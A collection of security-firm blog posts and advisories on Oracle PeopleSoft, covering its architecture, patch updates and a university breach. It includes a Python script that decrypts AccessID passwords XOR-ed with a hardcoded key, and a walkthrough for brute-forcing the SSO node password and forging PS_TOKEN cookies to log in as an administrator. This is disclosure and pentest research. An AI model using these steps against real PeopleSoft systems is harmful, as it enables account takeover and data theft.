Oracle PeopleSoft applications are quite complex and consist of many components, so their security is not a simple thing. While there is almost no research on PS security, successful attacks against such systems happen from time to time. That’s why we decided to start a series of articles about some aspects of PS security.

These applications are designed to address the most complex business requirements. They provide comprehensive business and industry solutions, enabling organizations to increase productivity, accelerate business performance, and lower cost of ownership.

Among Oracle's PeopleSoft applications are Human Resource Management Systems (HRMS), Financial Management Solutions (FMS), Supply Chain Management (SCM), customer relationship management (CRM), Enterprise Performance Management software (EPM), as well as software solutions for manufacturing and student administration. These applications can work as one big portal or separately.

PeopleSoft applications are used worldwide with more than 72% of customers in the USA. These applications are implemented in enterprises (more than 7000 companies), governments, and universities. The popularity of the solutions makes them an attractive target for cybercriminals.

Let's start with the basics. It is important to understand the architecture of PeopleSoft and to know some specific terms if you want to know more about methods of attacks against PeopleSoft. Today’s post is just a quick review of Oracle PeopleSoft Applications.

PeopleSoft's product suite was initially based on a client–server approach with a dedicated client. With the release of version 8, the entire suite moved to a web-centric design called PeopleSoft Internet Architecture (PIA). The new format allowed all of a company's business functions to be accessed and run on a web browser.

PeopleTools

The PeopleSoft Internet Architecture is built around PeopleSoft’s proprietary PeopleTools technology. The PeopleTools development and runtime environment includes the basic technology features on which PeopleSoft Enterprise Portal is based.

The PeopleTools consist of Application Designer, Application Engine, Data Mover and various other developer tools. PeopleTools contains many different components used to create web-based applications: a scripting language known as PeopleCode, design tools to define various types of metadata, standard security structure, batch processing tools, and the ability to interface with an SQL database. The metadata describe data for user interfaces, tables, messages, security, navigation, portals, etc. This set of tools allows the PeopleSoft suite to be platform-independent solution.

PeopleCode is an object-oriented proprietary (case-insensitive) language used to express business logic for PeopleSoft applications. In its fundamentals, PeopleCode syntax resembles other programming languages (like Java). Some aspects of the PeopleCode language, however, are specifically related to the PeopleTools environment.

PeopleSoft Internet Architecture (PIA)

PeopleSoft Internet Architecture consists of several components. You can see them on the picture below.

Image may be NSFW.
Clik here to view.

Web server

The web server receives application requests from web browsers/external systems and forwards the requests to the Oracle Jolt port on the application server. A number of PeopleSoft servlets running on the web server handle incoming requests. Like the server processes on the application server, each PeopleSoft servlet is designed to perform unique functions.

Oracle WebLogic (more popular) or IBM WebSphere can be used as the web server.

Application server

The application server is the core of the PeopleSoft Internet Architecture; it provides the business logic, processes all users’ requests and gets information from the database server. The application server consists of PeopleSoft services that handle transaction requests and a special connection dispatched (Oracle Tuxedo). Unique PeopleSoft services run on the application server, with each service type designed to handle specific types of transactions. For example, some server services are designed to handle browser requests, others are designed to handle Integration Broker requests. PeopleSoft services perform business logic of PeopleSoft applications.

PeopleSoft uses Oracle Tuxedo to manage database transactions, and Jolt, Tuxedo's counterpart, to facilitate transaction requests issued from the users’ browsers.

The PeopleSoft servlets on the web server transmit requests and data through a connection to Jolt, which runs on the application server. Jolt is the communication layer between the web-based environment and the C++ environments.

Database server (RDBMS)

The database server houses your database engine and your PeopleSoft database, which includes all of your object definitions, system tables, application tables, and data.

There are three distinct layers within the RDBMS that work in concert to store and manage data for the PeopleSoft system: database system tables, tables with PeopleTools metadata and tables with data of applications. The PeopleSoft application tables reside within the infrastructure defined by the PeopleTools metadata.

PeopleTools provides an abstraction layer, which insulates application developers from the intricacies of each of the specific database platforms.

PeopleTools development environment (2-/3-Tier Developers)

While many development and administrative tools and interfaces are accessible by browser, some tools are only available from a Windows-based workstation. There are Windows-based PeopleTools, which enables application developers, technical specialists, and system administrators to perform a variety of tasks.

It was a brief introduction to PeopleSoft Architecture. To discover more about PeopleSoft Security, stay tuned for the next part. Follow ERPScan on Twitter, LinkedIn and Facebook to keep up-to-date with the latest news and research on business application security.

by Alexey Tyurin, Head of Oracle Security at ERPScan

The post PeopleSoft Security Part 1: Overview of architecture appeared first on ERPScan.

Now that we have covered PeopleSoft Architecture, it is time to continue with PeopleSoft security and describe some attack vectors against PeopleSoft system discovered by ERPScan researchers. The first one is an attack on back-end systems.

First, we should clarify some essential terms:

• User ID – a PeopleSoft user account.
• Connect ID – a special account with minimal DBMS privileges.
• Access ID – a special account with a high level of DBMS privileges.

To begin with, let’s find out how the authentication of a PeopleSoft user into the application server works. Authentication consists of the following steps:

• A user sends his/her user ID and password to the application server.
• Application server retrieves these data and connects to the DBMS using Connect ID with the corresponding password. This DBMS account has limited access (can read the PSDBOWNER, PSSTATUS, PSOPRDEFN, PSACCESSPRFL tables). It requests User ID and password and compares them with those that were entered.
• If the credentials match, the application server retrieves the Symbolic ID associated with the User ID. Symbolic ID is just a link to a more important account: Access ID.
• The application server uses the retrieved Symbolic ID to find the necessary account (Access ID + password) in PSACCESSPRFL. This is a privileged account which has more rights in PeopleSoft database than Connect ID. Access ID and the password are encrypted.
• The application server uses Access ID to reconnect to the database.

Image may be NSFW.
Clik here to view.

So, Access ID is a high-privileged DBMS account. If an attacker can get it, they can pwn the whole PeopleSoft application.

Let’s take a closer look at the access available to Connect ID. It’s much easier to steal this account than Access ID because Connect ID is stored in plain text in some configuration files of the PeopleSoftapplication.

Connect ID allows us to read data from three tables, but only two of them store valuable information.

Image may be NSFW.
Clik here to view.

The first table – PSOPRDEFN – contains PeopleSoft usernames and their passwords. But the passwords are hashed, and each password even gets its own random salt. Of course, they can be bruteforced, but the result depends on password complexity.

Image may be NSFW.
Clik here to view.

The second table – PSACCESSPRFL – contains the encrypted Access ID and its password. Oracle documentation states that Access ID is encrypted and, therefore, secure. But is it true?

Image may be NSFW.
Clik here to view.

A small research of ours has only revealed an XOR operation with a hardcoded key. What’s more, the key is the same for all PeopleSoft applications. Thus, anyone can decrypt Access ID and its password. Here is a simple Python script that decrypts Access ID.

import base64, sys

def xor_strings(xs, ys):
 return "".join(chr(ord(x) ^ ord(y)) for x, y in zip(xs, ys))

if len(sys.argv) < 2:
 sys.exit('Usage: %s b64_encoded_value_of_AccessID_or_AccessPSWD' % sys.argv[0])

key = "\xE3\x45\x98\x30\xCD\x02\xAD\xA8"

result = base64.b64decode(sys.argv[1])
if len(result) != 8:
 print "Wrong encrypted value legth"

result = xor_strings(result, key)
print "Decrypted value is:\t"+result

The length restriction determines the feasibility of performing a bruteforce attack. An Access ID password cannot be longer than 10 symbols, which facilitates bruteforce attacks.

To sum up, once an attacker gets a Connect ID account and manages to connect to the DBMS, they can easily decrypt Access ID and take total control over PS.

In addition, I should mention that the same so-called “encryption” is used in PeopleTools applications for Windows: credentials are stored in the Windows registry (HKCU\Software\PeopleSoft\PeopleTools\Release8.40\).

This vulnerability was patched in Oracle CPU for October 2014 and the new method of encryption is now investigated by ERPScan Research Team.

So, that’s it for the article. Stay tuned to know more about PeopleSoft security. Follow us on Twitter, LinkedIn, and Facebook to keep up with latest SAP and Oracle security news.

The post PeopleSoft Security Part 2: “Decrypting” AccessID appeared first on ERPScan.

In the third part of the PeopleSoft Security series, we will describe how to log in under any account and gain full access to the PeopleSoft system.

What is PeopleSoft SSO and how does it work?

Like many other enterprise business applications, PeopleSoft supports various Single Sign-On technologies. SSO enables authentication into several systems by a single action: a user logs into one system manually and into others automatically.

PeopleSoft supports its own SSO implementation based on the PS_TOKEN cookie. Here is how it works:

1. User logs into the first PeopleSoft application;

2. PeopleSoft checks the user’s credentials. If successful, it returns the session cookie and the PS_TOKEN cookie to the user;

3. When the user tries to log into another PeopleSoft server, the browser automatically sends the PS_TOKEN;

4. The second PeopleSoft server receives the PS_TOKEN, parses it, and authenticates the user if the cookie is correct.

Image may be NSFW.
Clik here to view.

It is noteworthy that PS_TOKEN is the only element used by the servers to exchange authentications (they have no back-end connection) and it is transmitted via the client (because it’s a cookie).

There is an important term: Node. To put it simply, a node is a system participating in SSO. Any application is a separate node. One application may also contain several nodes. Each node must have a unique name.

Two settings are required to establish SSO between two servers. First, we have to specify the node name of each PeopleSoft server at the other PeopleSoft server. This is how it knows to trust the node with that name. Second, we have to give each node a Node Password which must be the same for all PeopleSoft servers.

Therefore, the PeopleSoft SSO is basically an implementation of the Pre-Shared Key technology.

There are more details about the PS_TOKEN format. Besides some additional technical fields at the beginning, it only has a few important values:

• UserID – name of the user who has logged in
• Lang – the user’s interface language
• Node Name – name of the node which has authenticated the user
• Date And Time – when the PS_TOKEN was issued
• Signature = SHA1_Hash (UserID + Lang + Node Name + Date And Time + Node Password)

When a server gets a PS_TOKEN, it decodes the cookie (PS_TOKEN is encoded by base64), joins the four values with its Node Password, takes a SHA1 hash and compares it to the Signature in the PS_TOKEN. If they are equal, then the cookie has not been modified, so the server authenticates the user under the User ID.

TokenChpoken Attack

Does it really look very secure?

The only value in the Signature that the attacker does not already know is Node Password.

If they can find a way to get the Node Password, they can forge a PS_TOKEN cookie with any User ID value, and the Signature will be correct.

How does one get the Node Password, then?

Easily: if we have any PS_TOKEN, we can take all important values out of it, add various passwords, and hash the result. If the hash is equal to the PS_TOKEN Signature, we have guessed the Node Password.

I have written a tool called TokenChpoken which can parse, bruteforce, and recreate PS_TOKEN cookies. This attack may not seem dangerous enough as it only allows attacking systems where SSO is established, but there are two important nuances:

• Any PeopleSoft application has at least one default local node. It is the node of the system itself. And it always trusts itself.
• There are a lot of situations when an administrator has to set the node password for default node.

Thus, even if you have never configured SSO for your PeopleSoft and it is a standalone PeopleSoft server, somebody can still attack it in the same way because we will receive a PS_TOKEN after authentication.

Image may be NSFW.
Clik here to view.

Moreover, the problem with this attack is that we need a PeopleSoft user account. In other words, it is a classical privilege escalation attack. What do we do if we have no account?

PeopleSoft design has more secrets.

It’s impossible to have access to some resources of a PeopleSoft Portal without authentication, but sometimes it’s necessary. Imagine an HRMS portal exposed to the Internet that needs to allow anonymous users to see available jobs and fill in the application form. Another typical example is password recovery: this is also a part of the system that an anonymous user can connect to.

To solve such tasks, there is a special PeopleSoft user with minimal PeopleSoft privileges and it is configured to log in automatically. So, if someone with no user account visits the anonymous PeopleSoft application functionality, PeopleSoft will automatically authenticate them as that special user, and a PS_TOKEN cookie will also be issued.

To sum up, we can attack a lot of PeopleSoft applications without any credentials.

Furthermore, PeopleSoft SSO is also used in other Oracle applications like JD Edwards. This allows attacking them under certain circumstances, too.

How to defend your PeopleSoft system:

• Disable SSO completely (but very often it’s impossible because a part of PeopleSoft will not work at all)
• Set up a very complex Node Password (max 24 symbols)
• Use certificates instead of Node Passwords

If you’d like to learn more about PeopleSoft Security, stay tuned for the next part and follow ERPScan on Twitter, LinkedIn, and Facebook.

The post PeopleSoft Security Part 3: PeopleSoft SSO & TokenChpoken Attack appeared first on ERPScan.

In the previous blog post about PeopleSoft Security we looked at the TockenChpoken attack and PeopleSoft SSO. Today we will go through all steps of exploitation of the attack which can help you during a PeopleSoft pentest. It consists of 3 key steps.

Preparation: Get an “original” ps_token

1. The TockenChpoken attack, by its nature, is a kind of privilege escalation attack. Therefore, we (as a penetration testers) need a valid user credential to exploit it successfully.

There are several main ways how we can get it:

• Check for default credentials;
• Dictionary/bruteforce attack;
• Various attacks on PeopleSoft users (XSS, MiTM, etc.) to steal a user’s authentication cookie (PSJSESSIONID, PS_TOKEN);
• MitM attacks on PeopleSoft web services, because they can also use ps_token for authentication;
• Via “Autologin” feature. A PeopleSoft application can be configured to authenticate an anonymous user automatically;
• Stolen credentials or cookies from other Oracle applications. For example, JD Edwards can be configured to support PeopleSoft SSO technology, so we can attack it too.

When we have a valid user credential, we can login into a PeopleSoft application and get a ps_token.

There is an additional, but sometimes useful step – to check the obtained ps_token.

We should delete all browser cookies and set only the ps_token, and the PS application should authenticate us. If it fails, there is something wrong with a configuration of SSO, so the TockenChpoken attack will not work out.

Attack

2) Perform the TockenChpoken attack on an “original” ps_token

First, we need to download the TockenChpoken penetration testing toolkit. The toolkit consists of three Python scripts. Two of them we will use on this step and the last one – on the next step.

The first script (parse.py) parses a ps_token and gives us all valuable information from it.

Example:

python parse.py -c PS_TOKEN_COOKIE_HERE

Output example:

SHA-1 hash from the token: e36a2b956e0466aebb4bb506da78538f2ecd4f99
 
Information from the token:
Little endian
PTWEBSERVER - user name
ENG - lang code
PSFT_HR - node name
2015-07-01-08.06.46.109641 - creation time
 
salt.txt is saved

We just need to set the “original” ps_token as an argument of the script. Also, the script generates a file (salt.txt, by default) containing the first part of values for the signature in a special format.

I should mention that during the testing of the toolkit we have found out two types of ps_tokens. It looks like the type depends on an architecture of a PS application’s hardware. So, there are ps_tokens with UTF-16 Little Endian encoding and UTF-16 Big Endian encoding. This fact doesn’t change the core of the attack, but the parsing process and a final hash value (signature) will differ.

As I have access to a PeopleSoft application with LE ps_tokens, the toolkit was fully tested on them. But I had only one BE ps_token (with a known node password) and I was not able to test the toolkit properly (actually, brute.py, as parce.py works with BE well).

As we parsed the ps_token and got all important values (salt.txt), we can go on to a dictionary/bruteforce attack on it in order to find a Node Password.

There is the second script (brute.py) in the toolkit. It gives us the opportunity to perform a dictionary attack on the ps_token. But being a Python script, it doesn’t provide a really high speed.

Nevertheless, I’ve added a list of the most widespread/default node passwords to the toolkit, so the toolkit guesses a correct node password pretty often.

Example:

python brute.py  -s e36a2b956e0466aebb4bb506da78538f2ecd4f99 -d dictionary.txt -f salt.txt

Moreover, as we remember, the signature we want to bypass is just a result of the SHA-1 hash function

Signature = SHA1(salt+password)

So, actually, we can use any brute forcing tools (HashCat, John The Ripper). But, unfortunately, HashCat doesn’t support the required length of the salt. On the other hand, knowing wide abilities of HashCat, I think it’s possible to bypass this restriction.

Well, having successfully bruteforced the ps_token and known the correct node password, we can create a new ps_token.

3) Create a new ps_token

We can easily create a new ps_token consisting of almost any values within it with the help of the last script of the TockenChpoken toolkit – generate.py

Just feed almost all values from parse.py and the node password from brute.py.

python generate.py -e 0 -u PS -l ENG -p password -n PSFT_HR -d 2015-07-01-08.06.46.

There we may face two obstacles:

A) As we know, the ps_token is valid for a limited lifetime. The time and date when the ps_token was created is stored within it (example: 2015-07-01-08.06.46.109641 - creation time). Therefore, we have to set an appropriate time for a new ps_token, otherwise, a PeopleSoft application will authenticate us with the new ps_token. It shouldn’t be “in the future” (I mean, run ahead the server time. Besides, it shouldn’t be “older” than a lifetime of ps_token.

In practice, there can be some problems with setting the correct time. But there are three sources that can help us:

• Time from the original ps_token; (from parse.py)
• Time from “PS_TOKENEXPIRE” cookie. A PeopleSoft application sets it after an authentication;
• Time from HTTP response header “Date”.

To check, you can get all values except time from parse.py, set a new time, create a new ps_token and try to log into a PeopleSoft application.

B) Also, we need to know a valid name of user we want to “become”. The common choice is to set “PS”, a default super administrator of a PS application. But again, in practice this option sometimes doesn’t work well (for example, because the PS account is blocked). Therefore, we need to find a valid username of an administrator.

As an attempt, we can try to use default or known usernames and then using this access get a list of all users. If prefer, we can log into each user and check its privileges.

Conclusion

In general, these are the main steps to perform the TockenChpoken attack and difficulties one may meet during PeopleSoft penetration tests.

I’d like to thank everyone who helps me with the testing of the toolkit and send me feedbacks reporting results and problems.

By the way, if you have access to a PeopleSoft application with Big endian ps_tokens and with a known node password, please, write me.

The post PeopleSoft Security part 4: PeopleSoft pentest using TokenChpoken Tool appeared first on ERPScan.

Last Wednesday Harvard University announced that on June 19 an intrusion on Faculty of Arts and Sciences and Central Administration information technology networks was discovered. According to the announcement on Harvard website, this breach affected eight different schools and thought to have exposed students' log-in credentials. University IT staff denied that any personal data or information from internal email system had been exposed.

An advisory on the website urges people affiliated with the affected institutions to change their passwords. Password change could be required again soon as a part of security measures to protect Harvard system.

It is not the first time Harvard was hacked. Earlier this year AnonGhost group hacked website of Institute of Politics at Harvard and in 2012 Harvard was attacked by GhostShell team, which also took responsibility for hacking servers of 100 major universities such as Stanford, the University of Pennsylvania and the University of Michigan.

Higher education certainly is one of the most targeted and – meanwhile – common industries for cyber-attacks. Increased attention to the security of educational institutions derives from the fact that universities are less secure than enterprises while college ERP systems contain not less valuable data, and the amount of important information may be even bigger, that entails large number of potential victims of an attack. The detailed reasons why both cybercriminals and security specialists focus on this area are described below.

Why are universities systems a perfect target for cyber-attacks?

The first and the main reason lies in the environment of campus systems. University networks have a large number of users. Thousands of freshmen go to university every year, it's hard to imagine that any business institution hires so many new employees on the regular basis. College systems store personal information, payment information, and medical records of current and former students and employees. The great amount of sensitive information always comes with attempts to steal them. The exposure of this information may have long-term consequences, as some of the students of the top universities are likely to hold key positions in the nearest future.

University systems supported BYOD (bring your own device) policy before this term appeared in the business area. Students are active in using latest technologies. File sharing, social media, and adult content is a source of malware and viruses. If a student's device synced with college network is compromised, it's not only the student who is affected, so is the university. More information on mobile application security and mobile Device management security you can find in our article.

Universities have to provide an easy access to their systems for all these students and personnel. It makes incidents investigation more difficult than when we deal with business structures.

Finally, such systems can store not only educational and personal information but governmental and even military research materials. So, university systems are an attractive target to state-sponsored hackers, as this information can be used for industrial or state espionage.

What had happened? Was Harvard breached via a vulnerability in PeopleSoft?

Harvard has not disclosed any technical details about the breach, thus, it is a fertile ground for speculations and baseless conclusions. The only thing we can say for sure is that PeopleSoft application is installed in multiple Harvard colleges (as it is known from public sources) and that real examples of universities' hack via PeopleSoft vulnerabilities took place in last few years.

Several cases of data breaches related to vulnerabilities in Oracle PeopleSoft applications have been published in the media since 2007 when two students faced 20 years in prison after they hacked California state university's PeopleSoft system. In August 2007, three students installed keylogging software on computers at Florida A & M University and used the passwords they gleaned to gain access to the school's PeopleSoft system to modify grades. A student at the University of Nebraska in 2012 was able to break into a database associated with the university's PeopleSoft system, exposing Social Security numbers and other sensitive information on about 654,000 students, alumni and employees. In March 2013, Salem State University in Massachusetts alerted 25000 students and staff that their Social Security Numbers may have been compromised in a database breach. And this is not the full list of university attacks, and it is only against PeopleSoft systems.

PeopleSoft systems are widely used in higher education, they are implemented in more than 2000 universities and colleges around the world. ERPScan's research revealed that 236 servers related to universities are accessible on the internet (including Harvard server). It means that at least 13% of universities with PeopleSoft systems are accessible from the Internet while Enterprises have about 3-7% depending on the Industry. 78 of these universities are vulnerable to TokenChpoken attack presented at HackInParis Conference by Alexey Tyurin. 7 of these universities are among America's top 50 colleges by Forbes, so they seem a real treasure for cybercriminals.

TokenChpoken attack allows to find the correct key to Token, login under any account and get the full access to the system. In most cases, it takes not more than a day to decrypt token by using a special bruteforcing program on latest GPU that costs about $500. It's almost impossible to identify the fact of this attack, as an attacker uses common legitimate system functionality, he brute-forces token password remotely by downloading a token from web page, and then all he needs is just to log to the system.

Other Universities (besides 78 mentioned before) are also potentially vulnerable, but only students with access to internal University PeopleSoft system can exploit this vulnerability and get administrative rights. Moreover, 12 universities still have a default password for a token, so any unskilled attacker can successfully perform an attack.

What should we learn from the hacks?

First, we should admit that higher education institutions face risks that can actually result in espionage, blackmail, and fraud.

PeopleSoft is clearly the leader in higher education though there are other university ERP vendors like Three Rivers Systems, Ellucian, Jenzabar, Redox, and others.

As all university networks are complex and consist of numerous modules and there are numerous vulnerabilities in them, protecting them seems a nightmare for any IT team. Cybersecurity is not some separate steps taking from time to time, but the ongoing process. Of course, no one can prevent all threats and attacks, so safety lies in continuous monitoring and mitigation of risks.

The awareness of Oracle PeopleSoft security is even worse than with SAP Security where is also the lack of awareness, but it is decreasing. As for PeopleSoft, there are real examples of vulnerabilities and breaches, but nobody cares about it.

The post Universities are at risk of data breaches: is it possible to protect them? appeared first on ERPScan.

Application: Oracle Weblogic Application Server
Versions Affected: WebLogic Server 10.3.6.0/10.3.1.0, maybe others
Vendor URL: http://www.oracle.com
Bugs: Authorization bypass
Exploits: YES
Reported: 11.06.2014
Vendor response: 12.06.2014
Date of Public Advisory: 17.10.2014
Reference: Oracle CPU October 2014
Author: Alexey Tyurin (ERPScan)

VULNERABILITY INFORMATION
Class: [CWE-425]
Impact: Partial Authorization bypass (Directory lising, RCE for Windows OS)
Remotely Exploitable: Yes
Locally Exploitable: No

Description
A remote attacker can conduct an Authorization Bypass attack against Oracle Weblogic Application Server and gain full control.

Business Risk
The vulnerability can lead to disclosure of the information on the system without authentication and can help an attacker to penetrate the system. An attacker can use the information from this service for subsequent attacks, which will lead to illegal access to business-critical information.

VULNERABLE PACKAGES
WebLogic Server 10.3.6.0/10.3.1.0
Other versions are probably affected too, but they were not checked.

SOLUTIONS AND WORKAROUNDS
Patch or Set Strong Passwords for a WebLogic's accounts.

TECHNICAL DESCRIPTION Proof of Concept Directory listing
http://weblogic_server/console/console.portal?_nfpb=true&_pageLabel=AppApplicationInstallPage
http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html

The post [ERPSCAN-14-022] Oracle Weblogic Application Server – Authorization bypass appeared first on ERPScan.

Application:Oracle PeopleSoft PeopleTools
Versions Affected: Oracle PeopleSoft PeopleTools 8.53 / 8.50
Vendor URL: http://www.oracle.com
Bugs: Insecure encryption
Exploits: YES
Reported: 11.06.2014
Vendor response: 12.06.2014
Date of Public Advisory: 17.10.2014
Reference: Oracle CPU October 2014
Author: Alexey Tyurin (ERPScan)

Description
A remote attacker can get access to the database.
AccessID password is stored in XOR format, which gives the opportunity to get the plain text version of the password using ConnectionID account access to the database.

Business Risk
The vulnerability can lead to disclosure of the information on the system without authentication and can help an attacker to penetrate the system. An attacker can use the information from this service for the subsequent attacks which will lead to illegal access to the business-critical information.

Details
PeopleSoft application server (and some tools) connects to the database with a ConnectionID. The server stores it in the plain text format in some configs.
But ConnectionID only gives access to some tables. For high privileged operation, the application server uses AccessID, which is stored in the database (accessible with ConnectionID).
Oracle documentation says that the AccessID password is encrypted, but it is wrong. The password is just XOR'ed with a hardcoded value.
We have made a small tool which converts "encrypted" AccessID passwords into the plain text.

The post [ERPSCAN-14-023] Oracle PeopleSoft PeopleTools – insecure AccessID encryption appeared first on ERPScan.

Today Oracle has released its quarterly critical patch update for October 2015. It fixes a total of 154 vulnerabilities.

The previous CPU for July 2015 closed 193 security vulnerabilities which is 20% more than in this one, but this one still adresses more security issues than the average number.

Image may be NSFW.
Clik here to view.

This quarter, some of the vulnerabilities were discovered in the core platform of Oracle’s most popular Enterprise application - Oracle EBS (E-Business Suite). These issues are important because they affect critical business applications based on E-Business Suite platform such as Value Chain Execution suite, Value Chain Planning, Advanced Procurement, Supply Chain Management, Project Portfolio Management, Human Capital Management, Financial Management, Service Management, and Customer Relationship Management. Listed applications store and process the most valuable corporate data such as HR information, financial data, supplier and customer lists, and others. It means that in case of successful attack, a malicious person can manipulate data about quantity of material resources, change the item prices, misappropriate funds, and modify financial reports, just to name a few.

Oracle Critical Patch Update Analysis

Below you can find the details of the most significant vulnerabilities closed by this Critical Patch Update provided by ERPScan Research and Oracle Security Intelligence teams.

Oracle vulnerabilities by Application type

Image may be NSFW.
Clik here to view.

The affected product families are as follows: Oracle database, Oracle Fusion Middleware, Oracle Hyperion, Oracle Enterprise Manager, Oracle E-Business Suite, Oracle Supply Chain Products Suite, Oracle PeopleSoft Enterprise, Oracle Siebel CRM, Oracle Industry Applications, including Oracle Communications Applications and Oracle Retail Applications, Oracle Java SE, Oracle Sun Systems Products Suite, Oracle Pillar Axiom, Oracle Linux & Virtualization, and Oracle MySQL.

Oracle vunerabilities by severity

Image may be NSFW.
Clik here to view.

The average CVSS Score in this udate is 5.4.

Oracle vunerabilities in business-critical applications

This quarter’s CPU addresses vulnerabilities affecting business-critical applications from Oracle, namely Oracle database, Fusion Middleware, E-Business Suite, Supply Chain Products Suite, PeopleSoft, Siebel CRM, Oracle Industry Applications, and Oracle Retail Applications. 65 (42%) of all of the patch updates close vulnerabilities in these products. Moreover, about 51% (33 issues) of these vulnerabilities can be exploited remotely without authentication.

Oracle PeoplesSoft Security

Oracle PeopleSoft is an application suite of business and industry solutions such as Human Capital Management, Financial management, Supplier Relationship Management, Enterprise Services Automation, and Supply Chain Management. As it manages a wide range of business processes and stores key data, a successful attack against PeopleSoft allows an attacker to steal or manipulate different business critical information, depending on modules installed in an organization. This Critical patch update contains 8 fixes for Oracle PeopleSoft with the highest CVSS score of 6.8.

Oracle E-Business Suite Security

Image may be NSFW.
Clik here to view.

Oracle E-Business Suite is the main business software developed by Oracle. Such business applications as Value Chain Execution suite, Value Chain Planning, Advanced Procurement, Supply Chain Management, Project Portfolio Management, Human Capital Management, Financial Management, Service Management, and Customer Relationship Management are based on this platform. As it manages a wide range of business processes and stores key data, a successful attack against PeopleSoft allows an attacker to steal and manipulate different business critical information, depending on modules installed in an organization.

This Critical patch update contains 12 fixes for Oracle EBS with the highest CVSS score of 10.

Oracle Siebel CRM Security

Image may be NSFW.
Clik here to view.

Oracle Siebel CRM is a Customer Relationship Management solution. It delivers transactional, analytical, and engagement features. A successful attack against it can result in gaining control over tenders and affect relationship with clients. This Critical patch update contains 1 fix for Oracle Siebel CRM with the CVSS base score of 4.3.

The most critical Oracle vulnerabilities closed by CPU October 2015

Oracle prepares Risk Matrices and associated documentation describing the conditions required to exploit a vulnerability and the potential impact of a successful attack. The severity of the vulnerabilities is calculated via the Common Vulnerability Scoring System (CVSS). This aims to help Oracle customers to fix the most critical issues first. This time, 12 vulnerabilities have received the highest CVSS score of 10.0. Most of them relates to Oracle Java SE.

• Portable Clusterware has CVE-2015-4863 (CVSS Base Score: 10.0) - Unspecified vulnerability in the Portable Clusterware component in Oracle Database Server 11.2.0.4, 12.1.0.1, and 12.1.0.2 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
• Oracle Applications Technology Stack has CVE-2015-4798 (CVSS Base Score: 10.0 ) - Unspecified vulnerability in the Oracle Applications Technology Stack component in Oracle E-Business Suite 11.5.10.2 allows remote authenticated users to affect availability via unknown vectors related to DB Listener, a different vulnerability than CVE-2015-4839.
• Oracle Applications Technology Stack has CVE-2015-483 (CVSS Base Score: 10.0) - Unspecified vulnerability in the Oracle Applications Technology Stack component in Oracle E-Business Suite 11.5.10.2 allows remote authenticated users to affect availability via unknown vectors related to DB Listener, a different vulnerability than CVE-2015-4798.
• Oracle Communications Diameter Signaling Router (DSR), Oracle Communications Performance Intelligence Center Software, Oracle Communications Policy Management, Oracle Communications Tekelec HLR Router and Oracle Communications User Data Repository has CVE-2015-2608 (CVSS Base Score: 10.0) - Unspecified vulnerability in (1) the Oracle Communications Diameter Signaling Router (DSR) component in Oracle Communications Applications 4.1.6 and earlier, 5.1.0 and earlier, 6.0.2 and earlier, and 7.1.0 and earlier; (2) the Oracle Communications Performance Intelligence Center Software component in Oracle Communications Applications 9.0.3 and earlier and 10.1.5 and earlier; (3) the Oracle Communications Policy Management component in Oracle Communications Applications 9.9.0 and earlier, 10.5.0 and earlier, 11.5.0 and earlier, and 12.1.0 and earlier; (4) the Oracle Communications Tekelec HLR Router component in Oracle Communications Applications 4.0.0; and (5) the Oracle Communications User Data Repository component in Oracle Communications Applications 10.2.0 and earlier allows remote attackers to affect confidentiality, integrity, and availability via vectors related to PMAC.
• Java SE, Java SE Embedded has CVE-2015-4835 (CVSS Base Score: 10.0) - Unspecified vulnerability in Oracle Java SE 6u101, 7u85, and 8u60, and Java SE Embedded 8u51, allows remote attackers to affect confidentiality, integrity, and availability via vectors related to CORBA, a different vulnerability than CVE-2015-4881.
• Java SE, Java SE Embedded has CVE-2015-4881 (CVSS Base Score: 10.0) - Unspecified vulnerability in Oracle Java SE 6u101, 7u85, and 8u60, and Java SE Embedded 8u51, allows remote attackers to affect confidentiality, integrity, and availability via vectors related to CORBA, a different vulnerability than CVE-2015-4835.
• Java SE, Java SE Embedded has CVE-2015-4843 (CVSS Base Score: 10.0) - Unspecified vulnerability in Oracle Java SE 6u101, 7u85, and 8u60, and Java SE Embedded 8u51, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Libraries.
• Java SE, Java SE Embedded has CVE-2015-4860 (CVSS Base Score: 10.0) - Unspecified vulnerability in Oracle Java SE 6u101, 7u85, and 8u60, and Java SE Embedded 8u51, allows remote attackers to affect confidentiality, integrity, and availability via vectors related to RMI, a different vulnerability than CVE-2015-4883.
• Java SE, Java SE Embedded has CVE-2015-4805 (CVSS Base Score:10.0) - Unspecified vulnerability in Oracle Java SE 6u101, 7u85, and 8u60, and Java SE Embedded 8u51, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Serialization.
• Java SE, Java SE Embedded has CVE-2015-4844 (CVSS Base Score: 10.0) - Unspecified vulnerability in Oracle Java SE 6u101, 7u85, and 8u60, and Java SE Embedded 8u51, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to 2D.
• Integrated Lights Out Manager (ILOM) has CVE-2015-4915 (CVSS Base Score: 10.0) - Unspecified vulnerability in the Integrated Lights Out Manager (ILOM) component in Oracle Sun Systems Products Suite 3.0, 3.1, and 3.2 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to System Management.
• Oracle FS1-2 Flash Storage System has CVE-2015-0235 (CVSS Base Score: 10.0) - Heap-based buffer overflow in the __nss_hostname_digits_dots function in glibc 2.2, and other 2.x versions before 2.18, allows context-dependent attackers to execute arbitrary code via vectors related to the (1) gethostbyname or (2) gethostbyname2 function, aka "GHOST."

Oracle Vulnerabilities that were patched with the help of ERPScan

This quarter, six critical vulnerabilities discovered by ERPScan researchers were closed . All of the issues affect Oracle E-Business suite, its flagship set of enterprise applications. The vulnerabilities identified by ERPScan constitutes a half of all security loopholes fixed this time

Below are the details of the security flaws identified by ERPScan researchers.

• Database user enumeration vulnerability (CVSS Base Score: 4.3) There is a script in EBS that is used to connect to the database and displays the connection status. Different connection results can help an attacker to find existing database accounts. This script allows an attacker to connect to the database with the given login/password, so the attacker can enumerate the database users.
• SQL injection vulnerability (CVSS Base Score: 3.6) By exploiting this vulnerability, an internal or external attacker will be able to escalate their privileges. With the help of this access, it is possible to obtain sensitive technical and business-related information stored in the vulnerable Oracle system.
• Cross-site Scripting vulnerability (CVSS Base Score: 4.3) A cross-site scripting vulnerability can lead to injection of malicious scripts into a trusted web site. By exploiting this vulnerability, an internal or external attacker will be able to escalate their privileges. With the help of this access, it is possible to obtain sensitive technical and/or business-related information stored in the vulnerable Oracle system.
